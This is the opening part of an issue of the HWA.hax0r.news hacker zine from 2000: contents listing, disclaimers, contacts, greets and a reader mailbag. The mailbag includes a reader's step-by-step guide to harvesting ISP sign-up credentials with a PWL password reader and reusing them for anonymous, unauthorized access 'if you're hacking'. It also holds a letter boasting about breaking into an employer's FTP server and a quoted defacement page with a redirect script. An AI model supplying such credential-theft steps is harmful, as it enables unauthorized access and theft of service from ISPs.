   204.0  .. HNS:Apr 6th:COMPUTER CODES PROTECTED..............................
   205.0  .. HNS:Apr 6th:RELEASED AFTER CODE MACHINE THEFT.....................
   206.0  .. HNS:Apr 6th:CYBERPATROL BLOCK LIST................................
   207.0  .. HNS:Apr 5th:CRYPTO REGULATIONS....................................
   208.0  .. HNS:Apr 5th:GFI AND NORMAN TEAM UP................................
   209.0  .. HNS:Apr 5th:MASTERCARD OFFER VIRUS REPAIR SERVICE.................
   210.0  .. HNS:Apr 5th:BUFFER OVERFLOWS......................................
   211.0  .. HNS:Apr 5th:PIRACY................................................
   212.0  .. HNS:Apr 5th:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER..................
   213.0  .. HNS:Apr 5th:GROUP APPEALS DVD CRYPTO INJUNCTION...................
   214.0  .. HNS:Apr 5th:VIRUS BLOWS A HOLE IN NATO'S SECURITY.................
   215.0  .. HNS:Apr 4th:FIGHT SPAM WITH SPAM..................................
   216.0  .. HNS:Apr 4th:REALPLAYER BUFFER OVERFLOW............................
   217.0  .. ISN:Mar 18th:Serbs hacked Britain's top-secret military computers.
   218.0  .. March 15th: CRYPTOGRAM newsletter.................................
   219.0  .. ISN:Mar 18th:Microsoft fends off hackers with Windows 2000........
   220.0  .. ISN:Feds Behind Recent Massive Web Hacking/Fwd....................
   221.0  .. ISN:Hacker 'Gatsby' Gets 18-Month Sentence........................
   222.0  .. ISN:Naval officer in hot water over policy........................
   223.0  .. ISN:Police to step up fight against e-crime.......................
   224.0  .. ISN:Developers blasted on security................................
   225.0  .. ISN:"Islands in the clickstream, in defense of hacking"...........
   226.0  .. ISN:Man angry at employer swallows own head.......................
   227.0  .. ISN:Nasa division battles the hack from ipanema...................
   228.0  .. ISN:Toys'R'Us.....................................................
   229.0  .. ISN:Computer expert accused of hacking............................
   230.0  .. ISN:Disney and Miramax Sued for 'Hacking'.........................
   231.0  .. ISN:Hacker posts own version of Gore's speech online..............
   232.0  .. ISN:Bennett leads cyber defense...................................
   233.0  .. ISN:Hackers rue blurred line between curiosity, vandalism.........
   234.0  .. ISN:Curador worked as e-commerce consultant.......................
   235.0  .. ISN:White house official charged with spreading phone codes.......
   236.0  .. ISN:Hackers hold conference in Israel.............................
   237.0  .. ISN:Old school MIT stylie "hacking" still makes news?.............
   238.0  .. ISN:US Census tests security......................................
   239.0  .. ISN:Visa program targets online fraud.............................
   240.0  .. ISN:GAO lists security bargains...................................
   241.0  .. ISN:DeBeers leaks customer info...................................
   242.0  .. ISN:Cybersleuths want to hack bill of rights......................
   243.0  .. ISN:Third laptop gets lifted......................................
   244.0  .. ISN:Government suck rocks at busting computer criminals...........
   245.0  .. CanSecWest/core00 Canadian Security Conf..........................
   246.0  .. PSS: BeOs Network DoS.............................................
   247.0  .. PSS: TESO Security Advisory BinTec router weakness................
   248.0  .. b0f: namedscan.c..................................................
   249.0  .. PSS:Advisory: MailForm v1.91 for Windows 95 and NT 4.0............
   250.0  .. PSS: CGI rmp_query scanner........................................
   251.0  .. PSS: New ircii exploit............................................
   252.0  .. PSS:Cerberus Information Security Advisory (CISADV000330).........
   253.0  .. PSS:Win32 Realplayer 6/7 Buffer Overflow..........................
   254.0  .. ISS Security summary data sheet...................................
   255.0  .. PSS: suse kreatecd root compromise................................
   256.0  .. PSS: irix object server remote root exploit.......................
   257.0  .. PSS: Sun bind advisory............................................
   258.0  .. Cyberprofiling....................................................
   259.0  .. mIRC 5.7 Exploit code.............................................
   260.0  .. Spaghetti proxy server exploit code...............................
   261.0  .. schoolbus.c - netbus 1.7 client exploit crashes script kids box...
   262.0  .. Protocol reverse engineering using Sub7 as an example.............
   263.0  .. Essay:Elf Orin: The meaning of being a hacker.....................
   264.0  .. Linux 2.2.x masq tunnel/hijack scenario..........................
   265.0  .. AWARD Bios password cracker .c source code........................
   266.0  .. Locked out? default BIOS/CMOS password list.......................
        
    =-------------------------------------------------------------------------=
    
        
    AD.S  .. Post your site ads or etc here, if you can offer something in 
             return thats tres cool, if not we'll consider ur ad anyways so
             send it in. Ads for other zines are ok too btw, just mention us 
             in yours, please remember to include links and an email contact.
             
    Ha.Ha .. Humour and puzzles  ............................................
             
              Oi! laddie! send in humour for this section! I need a laugh 
              and its hard to find good stuff... ;)...........................

    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
       *      COMMON TROJAN PORTS LISTING.....................................       
     A.1   .. PHACVW linx and references......................................
     A.2   .. Hot Hits (.gov and .mil + other interesting traffic on our site)
     A.3   .. Mirror Sites list...............................................
     A.4   .. The Hacker's Ethic 90's Style..................................
     A.5   .. Sources........................................................
     A.6   .. Resources......................................................
     A.7   .. Submission information.........................................
     A.8   .. Mailing lists information......................................
     A.9   .. Whats in a name? why HWA.hax0r.news??..........................
     A.10  .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again).
     A.11  .. Underground and (security?) Zines..............................
     
        *  Feb 2000 moved opening data to appendices, A.2 through A.10, probably
           more to be added. Quicker to get to the news, and info etc... - Ed 
  =--------------------------------------------------------------------------=
     
     @HWA'99, 2000
     
   

     
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

                         _                     _
                        | |    ___  __ _  __ _| |
                        | |   / _ \/ _` |/ _` | |
                        | |__|  __/ (_| | (_| | |
                        |_____\___|\__, |\__,_|_|                           
                                   |___/
                               


     THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF 
     THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE 
     RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
     IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS 
     (SEE FAQ).

     Important semi-legalese and license to redistribute:

     YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE 
     GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS 
     Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS
     ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is 
     http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE 
     ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL 
     I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email 
                         
                         cruciphux@dok.org

     THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS
     ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT
     AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
     
     I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND 
     REDISTRIBUTE/MIRROR. - EoD
     
     
                            ** USE NO HOOKS **

 
      Although this file and all future issues are now copyright, some of the 
      content holds its  own copyright and these are printed and respected. News 
      is news so i'll print any and all news but will quote sources when the 
      source is known, if its good enough for CNN its good enough for me. And 
      i'm doing it for free on my own time so pfffft. :)

     No monies are made or sought through the distribution of this material.      
     If you have a problem or concern email me and we'll discuss it.

     HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts      
     Warez Archive?), and does not condone 'warez' in any shape manner or 
     form, unless they're good, fresh 0-day and on a fast site. <sic>
 
     cruciphux@dok.org
 
     Cruciphux [C*:.] HWA/DoK Since 1989



00.1 CONTACT INFORMATION AND MAIL DROP 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                     ____            _             _
                    / ___|___  _ __ | |_ __ _  ___| |_ ___
                   | |   / _ \| '_ \| __/ _` |/ __| __/ __|
                   | |__| (_) | | | | || (_| | (__| |_\__ \
                    \____\___/|_| |_|\__\__,_|\___|\__|___/


     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit
    thanks.

    Send all goodies to:
    

	    	HWA NEWS
	    	P.O BOX 44118
	    	370 MAIN ST. NORTH
	    	BRAMPTON, ONTARIO
	    	CANADA
	    	L6V 4H5
	    
	    
    
    WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
    ~~~~~~~  are reading this from some interesting places, make my day and 
             get a mention in the zine, send in a postcard, I realize that 
             some places it is cost prohibitive but if you have the time and
             money be a cool dude / gal and send a poor guy a postcard 
             preferably one that has some scenery from your place of 
             residence for my collection, I collect stamps too so you kill
             two birds with one stone by being cool and mailing in a postcard,
             return address not necessary, just a  "hey guys being cool in
             Bahrain, take it easy" will do ... ;-) thanx.



    Ideas for interesting 'stuff' to send in apart from news:

    - Photocopies of old system manual front pages (optionally signed by you) 
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. <g>
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.
    
    
    Stuff you can email:
    
    - Prank phone calls in .ram or .mp* format
    - Fone tones and security announcements from PBX's etc
    - fun shit you sampled off yer scanner 
    - reserved for one smiley face ->        :-)            <-
    - PHACV lists of files that you have or phac cd's you own (we have a burner)
    - burns of phac cds (email first to make sure we don't already have em)
    - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc 
    

    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it <BeG>

    Our current email:

    Submissions/zine gossip.....: cruciphux@dok.org                                                                   
    Private email to editor.....: cruciphux@dok.org                                                                   
    Distribution/Website........: sas2@usa.net       
    
    Other methods:
    
    Cruciphux's ICQ: 58939315 note: not always online, and do not abuse or use 
    for lame questions!
    My preferred chat method: IRC EFnet in #HWA.hax0r.news

    @HWA
    
    

00.2 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~
      
            __        ___                                      ___
            \ \      / / |__   ___   __ _ _ __ _____      ____|__ \
             \ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
              \ V  V / | | | | (_) | (_| | | |  __/\ V  V /  __/_|
               \_/\_/  |_| |_|\___/ \__,_|_|  \___| \_/\_/ \___(_)

 
      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      cruciphux@dok.org.........: currently active/editorial
      darkshadez@ThePentagon.com: currently active/man in black
      fprophet@dok.org..........: currently active/programming/IRC+ man in black
      sas2@usa.net .............. currently active/IRC+ distribution
      vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black
      twisted-pair@gmx.net......: currently active/programming/IRC+
      pyra......................: currently active/crypto queen


      Foreign Correspondents/affiliate members (Active)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       Qubik ............................: United Kingdom 
       D----Y ...........................: USA/world media
       Zym0t1c ..........................: Dutch/Germany/Europe
       Sla5h.............................: Croatia
       Spikeman .........................: World Media/IRC channel enforcer
       HWA members ......................: World Media
       Armour (armour@halcon.com.au).....: Australia 
       Wyze1.............................: South Africa
       Xistence..........................: German/Dutch translations
       
      
      
      Past Foreign Correspondents (currently inactive or presumed dead) 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       N0Portz ..........................: Australia           
       system error .....................: Indonesia           
       Wile (wile coyote) ...............: Japan/the East      
       Ruffneck  ........................: Netherlands/Holland 
       

       
       Please send in your sites for inclusion here if you haven't already
       also if you want your emails listed send me a note ... - Ed

      Spikeman's site is down as of this writing, if it comes back online it will be
      posted here.
      
      http://www.hackerlink.or.id/  ............ System Error's site (in Indonesian) 
      
      Sla5h's email: smuddo@yahoo.com
       

       *******************************************************************
       ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
       *******************************************************************

    :-p


    1. We do NOT work for the government in any shape or form. Unless you count 
       paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

    2. MOSTLY Unchanged since issue #1, although issues are a digest of recent 
       news events its a good idea to check out issue #1 at least and possibly 
       also the Xmas 99 issue for a good feel of what we're all about otherwise 
       enjoy - Ed ...


    @HWA



 01.0 Greets!?!?! yeah greets! w0w huh. - Ed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                           ____               _
                          / ___|_ __ ___  ___| |_ ___
                         | |  _| '__/ _ \/ _ \ __/ __|
                         | |_| | | |  __/  __/ |_\__ \
                          \____|_|  \___|\___|\__|___/


     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, whats good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in
     your thoughts anyway.
     
     
     New members/affiliates
     
     Xistence      .....        General news and Dutch/German translations
     
     sP|a|Zm       .....        Swedish news / translations
     
     SugarKing     .....        General news articles


       * all the people who sent in cool emails and support
       
     FProphet       Pyra                TwstdPair     _NeM_     
     D----Y         Dicentra            vexxation     sAs*
     Spikeman       p0lix               Vortexia      Wyze1     
     Pneuma         Raven               Zym0t1c       duro     
     Repluzer       astral              BHZ           ScrewUp     
     Qubik          gov-boi             _Jeezus_      Haze_     
     theduece       ytcracker           loophole      BlkOps     
     MostHated      vetesgirl           Slash         bob-
     CHEVY*         Debris              pr1zm         JimJones 
     Dragos Ruiu    pr0xy               MR^CHAOS      Eckis   
     Fuqrag         Messiah             v00d00        meliksah
     dinkee         omnihil             sP|a|Zm       OE
     KillNow        iPulse              erikR         prizm
     paluka         Xistence            doobee        phold hi ;)     
     {}             mixter              merXor        abattis
     Xistence       
     
     #darknet #feed-the-goats #EUA #IBT the b0f crew etc fuck I 
     
     /storm/ did you do it yet? ;-) i'll get your shit in here
     soon.. promise :)
     
     
     shouts to Xochitl13 for sending the cool postcard with a pic
     of the la 2600 meeting place. cheers dude!
     
     
     Folks from #hwa.hax0r,news and other leet secret channels,
     *grin* - mad props! ... ;-)
     
     And many others, sorry if i missed you or forgot you! mail
     me and i'll flail myself unforgivingly in front of my open
     bedroom window until I bleed, then maybe, add u to the list 
     (please, don't ask for pics...)
     
     Also mad props to doobee and the CCC (Chaos Computer Club)
     in Germany for setting up a new listserv system to help
     distribute the zine. (Will be in action soon, I have admin
     work to do first and testruns..).
     
     :-)))
     
     
               
     Ken Williams/tattooman ex-of PacketStorm,
     
     SpaceRogue for running a kick ass news net 
     
     Emmanuel Goldstein for pure staying power
     
     All the crackers, hackers and phreakers 
     
     The sysadmins, NOC controllers, network engineers
     IRCops, security professionals, tiger team operatives
     military cyberwar grunts, feds and 'special computer
     unit' coppers trying to keep shit together in this
     anarchic chaos.
          
     AND
     
     Kevin Mitnick (free at last, stay free this time man...)
     
     Kevin was released from federal prison on January 21st 2000. For more
     information on his story visit http://www.freekevin.com/
     
     Recently reported 'helping' out the feds with security advice!
     
       
     
     
     kewl sites:
     
     + http://hackdesk.dhs.org/  NEW -> NEWBIE help + MORE
     + http://www.hack.co.za  **DOWN **
       EfNet channel: #darknet    
                              
                                        
     + http://blacksun.box.sk. 
     + http://packetstorm.securify.com/ 
     + http://www.securityportal.com/ 
     + http://www.securityfocus.com/ 
     + http://www.hackcanada.com/
     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://www.freekevin.com/
     + http://www.genocide2600.com/
     + http://www.hackernews.com/ (Went online same time we started issue 1!)
     + http://www.net-security.org/
     + http://www.slashdot.org/
     + http://www.freshmeat.net/
     + http://www.403-security.org/
     + http://www.pure-security.net/
     + http://ech0.cjb.net/

     @HWA


 01.1 Last minute stuff, rumours and newsbytes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
          
                _   _                   ____        _
               | \ | | _____      _____| __ ) _   _| |_ ___ ___
               |  \| |/ _ \ \ /\ / / __|  _ \| | | | __/ _ Y __|
               | |\  |  __/\ V  V /\__ \ |_) | |_| | ||  __|__ \
               |_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/
                                              |___/

      
      

       "What is popular isn't always right, and what is right isn't
         always popular..."
                           - FProphet '99
                           
         
         
         
         Since we provide only the links in this section, be prepared
         for 404's - Ed        
         

    +++ When was the last time you backed up your important data?
    
     ++ http://zcaofficedirectory.com/
        Beware of "pay-per-call" Area Code 809 SCAM!
        Do not respond to e-mails, phone calls, or pages which inform you
        to call Caribbean Islands Area Code " 809 " phone number.
        If you call from the United States, you will apparently be charged
        $25.00 per minute (without being warned beforehand).
        It's important to prevent becoming a victim of this SCAM.
        Check all area codes before returning a call.

    
          
     
      Thanks to myself for providing the info from my wired news feed and
      others from whatever sources, Zym0t1c and also to Spikeman for sending
      in past entries.... - Ed
      
     @HWA

 01.2 MAILBAG - email and posts from the message board worthy of a read 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      *** NEW WEB BOARD! ***
      
      ========================================================================
      
      The message board has been REVIVED with a new script and is doing quite
      well. Check it out
      
      
      http://discserver.snap.com/Indices/103991.html
      
      Don't be shy with your email, we do get mail, just not much of it 
      directed to other readers/the general readership. I'd really like to
      see a 'readers mail' section. Send in questions on security, hacking
      IDS, general tech questions or observations etc, hell we've even
      printed poetry in the past when we thought it was good enough to 
      share.. - Ed      
      
      =======================================================================
      
     * An interesting usenet email with a cool telephony URL to check out: *
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
          
     Date:  Fri, 25 Feb 2000 12:33:09 -0600
     From:  "Jennifer 'AstroJenn' Martino" <jennmartino@my-deja.com> 
     Subject: Re: HWA.hax0r.news Underground Security
     Organization: Not today. Not yesterday. And probably not tomorrow.
     To: Cruciphux <cruciphux@my-deja.com>
     Reply To: jennmartino@my-deja.com

     i have a few phone sounds that you might be interested in.. 
 
     cycle tone sweeper, switch verification messages, unidentifiable
     messages, those recordings that say a bunch of numbers, spit out touch
     tones and hang up, test messages, etc.
 
     less interesting than the above, but i also have recordings of some odd
     error messages, loops, blue box tones, red box tones, touch tones,
     ccitt5, a call from a jail.
 
     when applicable, the filename is the actual phone number i called to
     receive the sound. 
 
     unfortunately they are not in ram nor mp3 formats but..
 
     you can find my collection at 
 
                         hope that helps,
                         jenn
     -- 
     The Web Page You Have Reached                 http://twpyhr.usuck.com
     Over 225 telephone sounds. Home to "The Unofficial Touch Tone Tunes
     FAQ" "The Phoney Dance. A collection of telephone graphics.
 
     Jenn's Joint                                http://jennsays.usuck.com
     My Ob-Personal Page. 
     
     
     -=-
     
     Freebie net hack ... these things are everywhere now, if you can't get
     net access for free or dirt cheap you're paranoid or living under a 
     rock :-) ... of course remember, you get what you pay for - Ed
     
               
     
     From: M* H* <m*h*@????????.nl>
     To: <cruciphux@dok.org>
     Sent: Friday, March 24, 2000 9:58 AM
     Subject: submission
     
     
      I wrote this text just now, thought it might be useful (don't use my
      real name or something plz).
      
      Grtz,
      
      m-m
     
     -------------------------------------------------------------------------------
     
     
      ************************************************************
      *    HOW TO GET FREE (READ: ANONYMOUS) INTERNET ACCESS     *
      *             m-m <email: michiel@unbounded.com>           *
      ************************************************************
      
      
      YOU'LL NEED:
      Windoze (I'm sorry!)
      A PWL Reader (TIP: get the demo version of pwltool @ www.webdon.com)
      One of them ISP CD's with the M$ Internet Connection Wizard
      
      HOW DOES IT WORK:
      
      For the ones that don't know what the Internet Connection Wizard is, I'll 
      explain quickly. Since ISP's are constantly dying to get new members, they 
      (sometimes) give away free CD's with magazines and stuff. All ICW does is 
      make a temporary connection to a server, get some HTML, run Internet 
      Explorer in fullscreen and have you fill in some stupid forms which will 
      be CGI'd to the administration so you'll get your internet account... and 
      the bill. Filling in false info can be useful, but won't work long + it's 
      illegal.

      For the temporary connection to the server ICW just makes a new Dial-up 
      connection. So what you need to do is just boot up one of them CD's, make 
      that connection, alt+tab away and use the PWL Reader to get the temporary 
      info for the account.

      Cancel your subscribing and throw away the CD. The connection gets deleted 
      from your dialups automatically to prevent such abuse.

      Load up your normal internet connection and go to that ISP's website. Go 
      for technical support and get the nearest PoP. (Read: telephone number to 
      log in).

      Now make a new dialup connection with that number and the login name and 
      password you just earned with the PWL reader. Voila. You're connected. 
      (Note: these are usually guest/guest or stuff like that).

      Try reaching an external website (i.a. www.news.insource.nl). If you can't 
      connect it probably means the ISP was smart and blocked all external 
      traffic for the sign up account.

      I've tried this on several ISP's and it worked most of the time. Some 
      ISP's were smart enough to block such jokes but some weren't. Since 
      free internet is a fact these days this is only useful to remain 
      anonymous. (if you're hacking or something).
      
      <SNIP>
      
      end of email
      
      -=-
      
      
     
     
      From: Dragos Ruiu <dr@dursec.com>
      To: <*>
      Sent: Thursday, March 23, 2000 10:53 PM
      Subject: kyxspam: hnn hacked?
     
     
      After fielding TV reporter questions on the subject...
      I tried to go see what HNN had to say about Max,
      and www.hackernews.com got me a page that said:
      
      <html> 
      <head> 
      <title> 
      White House 
      </title> 
      </head> 
      <body bgcolor=white> 
      White House WhiteHouse White House 
      <SCRIPT LANGUAGE = "JavaScript"> 
      window.location = "http://www.whitehouse.com"; 
      </SCRIPT> 
      WHite House<br> 
       
      <h1><a href="http://www.whitehouse.com">White House</a></h1> 
       
      </body> 
      </html> 
       
      ... definitely not what I was looking for ....
      
      -- 
      dursec.com / kyx.net - we're from the future                      http://www.dursec.com
      learn kanga-foo from security experts: CanSecWest - May 10-12 Vancouver 
      
      Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org,
                RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com
     
     
     -=-
     
     Editor's note: this hack is unconfirmed and was not mentioned on HNN (curious),
     possibly a DNS grab; unknown at this time ... I'd have expected HNN to acknowledge
     any hacks, successful or not. Site whitehouse.com is a porn site... take that as you will.
     
     -=-
     

     From: Mr. Unknown <mr_unknown10@hotmail.com>
     To: <cruciphux@dok.org>
     Sent: Wednesday, March 22, 2000 7:18 PM
    
    
     First I want to say the zine is kickass.
     SugarKing pointed me to the latest one.  Read it last nite at work.  That 
     really sux that Fuqrag was raided.  I work at a place where he did a 
     defacement and maybe some other stuff.  ;)  Since then, I have been 
     interested about what else he was doing.  Only could catch the latest 
     defacements, though.  I get a good laugh at work when the servers go down<of 
     course NT> and say "FUQRAG IS BACK!"  They freak!  haa haa so funny it 
     really pisses them off.  They won't listen to me about our network's security 
     since I am only a pc tech. and they are big MSCE's.  I thought MSCE's had to 
     know their shit?  They set up an ftp server and told everyone that it didn't 
     allow anonymous log in, ha, should've seen their faces when some good pics 
     showed up in their personal directories. After they still hadn't figured out 
     who it was, I told them how to fix that problem.  What do you know, the next 
     day my admin rights were gone,<can't even add machines to the domain> and 
     the test account another admin setup for me was gone.  Even showed them 
     problems with asp.  It's just pissing them off and they are not doing 
     anything about it.  Not even patching old holes.   Very discouraging for me, 
     when I can show them how to fix their shit.  You would think after being 
     hacked they would do something.  Reading the interview with fuqrag was some 
     kewl shit.  I hope they take it easy on em.  I hope he writes some articles 
     for the zine, too.  Anyway I just wanted to let you know that the zine kicks 
     ass and content is good.  I wish to be as 313373 as fuqrag!!
     
     Keep up the great work
     
     mr.unknown
     ______________________________________________________
     Get Your Private, Free Email at http://www.hotmail.com
 
     
     -=-
     
     The kind of mail we love getting ... :-)  - Ed
     
     
     And some interesting SPAM ?!?
     
     
      <headers toasted>     
      
     
      Dear Web Master,

      Do you want to know how your computer skills rate?
      
      Take a FREE Brainbench certification exam ONLINE and find 
      out how good your IT skills really are.
      
       Every day, thousands of technical professionals take a FREE
      Brainbench certification exam online to rate their skills.
      They use the test results to get a better understanding of 
      their strengths and weaknesses or to earn a certification 
      that helps them get a better job. It only takes a moment to 
      register online for an exam. You will then immediately 
      receive your FREE test access code, which will allow you to 
      take the multiple-choice exam anytime within the next 30 
      days. Register NOW at 
      http://destinationsite.com/c?c=71838.2597.0.3128.0
      
      If you pass the exam, Brainbench will certify your skill and 
       mail you an attractive 8 1/2" x 11" certificate FREE! Plus
      you can make your certification available online if you 
      choose. As the world's leading skills certification 
      authority, Brainbench certifications are recognized by major
      employers and staffing organizations throughout the world.
      
      ============================================================
      Register for any FREE exam NOW and
      automatically enter a monthly drawing for $500.
      http://destinationsite.com/c?c=71838.2597.0.3128.1
      Take advantage of this great offer!
      Pass it along to your friends! 
      Brainbench has 60 different exams to choose from!
      ============================================================
      
      How does it work?
      1) Register for an exam at 
      http://destinationsite.com/c?c=71838.2597.0.3128.2
         There are about 60 exams to choose from. You will receive
         instructions on how to complete the exam when you register.
      2) When it is convenient for you, enter your test code at 
         the Brainbench website. You will take the multiple-choice 
         exam online. It will take about 45 minutes. You can take 
         it ANYTIME from ANYPLACE using a common web browser. 
         (version 3.0 or later preferred). 
      3) As soon as you finish the exam, you can view your test 
         results including your skill rating 
         (on a scale of 1.00 - 5.00) with a list of your strengths
         and weaknesses.
         To certify you need a score of 2.75 or higher.
         To certify as a Master, you need a score of 4.00 or 
         higher.
         The test engine is computer-adaptive, meaning it will 
         adjust to your skill level so whether you are a novice or
         an expert, it will ask questions that are close to your 
         skill level.
      4) All your information is held private unless you allow it 
         to be released.
      
      Who recognizes Brainbench certifications?
       1) Virtually all employers recognize Brainbench 
          certifications; we are the leading independent 
         certification authority with over 500,000 exams ordered 
         last year!
      2) Top technology companies and top staffing companies use
         Brainbench exams to screen their technical staffs, 
         including: Ernst & Young, EDS, CSC, 
         PriceWaterhouseCoopers, kforce.com, JP Morgan and many
         others.
       3) Due to Brainbench's secure adaptive-testing method, 
          employers trust the Brainbench approach to validating
          a job candidate's skills.
      
      What does it mean to be certified?
      1) It means you join the ranks of those professionals who 
         can prove that they have the credentials to do a job. 
         Employers will be more likely to put their trust in you.
      2) You can pursue, with confidence, the jobs you want.
      3) Whether you pass or not, every time you take the test
         you will receive a private report on your strengths and 
         weaknesses as well your personal ranking in the industry.
      
      Is it really FREE? 
      Yes. There is absolutely NO CHARGE to you. You can take the
      exam FREE. We'll mail your certificate, FREE. There are no
      hidden costs. We are doing this because we want to grow the 
      number of people who receive the benefit of a Brainbench 
      certification exam. We will eventually charge people to 
      take the exam, but for now it is FREE. So enjoy, and 
      please- pass this on to your friends.
      
      Register now for your FREE exam: at 
      http://destinationsite.com/c?c=71838.2597.0.3128.3
      
      
      Mike Littman
      Cofounder, Brainbench, The skills authority
      
      
      -=-
      
      From: <S*P*@*.?????.*.com>
      To: <cruciphux@dok.org>
      Sent: Saturday, March 18, 2000 5:42 AM
      Subject: Need a hand? ... I mean, Help?
     
     
      Hello, there... 
      I came across your HWA newsletter. I read you are looking for help.
       I have no clue about hacking and all the magic that you guys do. I can tell 
       you it fascinates me, and I've been reading attrition for quite a while. I 
      work with computers 
      (as in: Dummy 101 . Can't expect much from blondes...*ugh*)
      
        I'm originally from Italy. So, if you ever come across something to 
       translate from Italian to English I would be more than happy to help you out.
       I'd like to keep a very-very low profile. No profile at all would even be 
      better. 
      Just my 2 Cents.
      You're doing a wonderful job... 
      Ciao, ciao
      Simona
      
      -=-
      
      Don't usually post these, but just to prove we do get offers of help
      so don't sit there get up and do something too! :-)) - Ed
      
      -=-
      
       Using a cablemodem? Especially on the @HOME network? Expect weird shit;
       the teething problems aren't over... here's an interesting diatribe
       from Dragos on some recent @home-isms ... - Ed
      
      :

      From: Dragos Ruiu <dr@dursec.com>
      To: <*>
      Sent: Monday, March 20, 2000 11:58 PM
      Subject: kyxquestions: @home puke
     
     
      Here are more puzzles for all you armchair hacker sleuths...
      
      In the last two days my cablemodem has started spewing ICMP Host Unreachable
      packets from a local 10.11.* address to seemingly random addresses but each
      address is repeated multiple times.  Most of the dest hosts are in 207.230.246.*
      We are talking about lots of packets here... every couple of min.
      
       This was preceded by the unusual occurrence of 10.11.* -> 10.11.* traffic.
      Which was followed by mapping and poking at random 10.11.* addresses
      from varied addresses.  10.11 is where @ home puts their cablemodems.
      As to why I would be seeing this stuff on the client side of my cablemodem
       that's a good question - especially those 10.11 -> 10.11 packets. I haven't
      ruled out some flaky modem or router yet blasting garbage into the ether, and
      @home has been having to "reboot their servers" a lot lately.
      
       Other weird stuff is broadcasts from 10.11.* hosts on port 121 to subnet
      broadcast addresses.
      
       Looking back into the logs shows that this kind of ICMP storm has happened in the
      past weeks on and off a couple of times.  Interestingly, before today... the
      destination was always in the 172.16.*.* address space. Each time, the activity
      starts, is heavily active and then stops within minutes.... only today it seems
      to be going on and not abating and it seems to like destinations of
      207.230.246.[170,253] (what looks like a name server {woop, woop, danger will
      robinson} and a test box at vsb.bc.ca and 24.112.31.56 and 172.16.6.195 (no
       reverse dns lookup avail) as its favorite destinations.  Today's activity seems
      to all come from one cablemodem and the activity in the past seemed to vary in
      source modem address. The single source says to me that it may just
      be one flaky modem.
      
      Now I gotta go and find where the whois registry for the ca domain hides.
      
       Miscellaneous crud:
      
      24.113.85.105 cr547339-a.surrey1.bc.wave.home.com  which seems to be running
      some sort of port-1080-wingate sort of thing has been trying to log in to an ftp
      server here, when he oughtn't.
      
      And lots and lots of the typical wingate scans and along with oodles of the not
      so common yet Trin00/TrojanCow/DeepThroat 3.1 traffic/scans. Anybody got 
      a good rundown/synopsis of DeepThroat or Trojan Cow they can point me to?
      I have to go see what ArachNIDS says. BTW for those that are keeping score
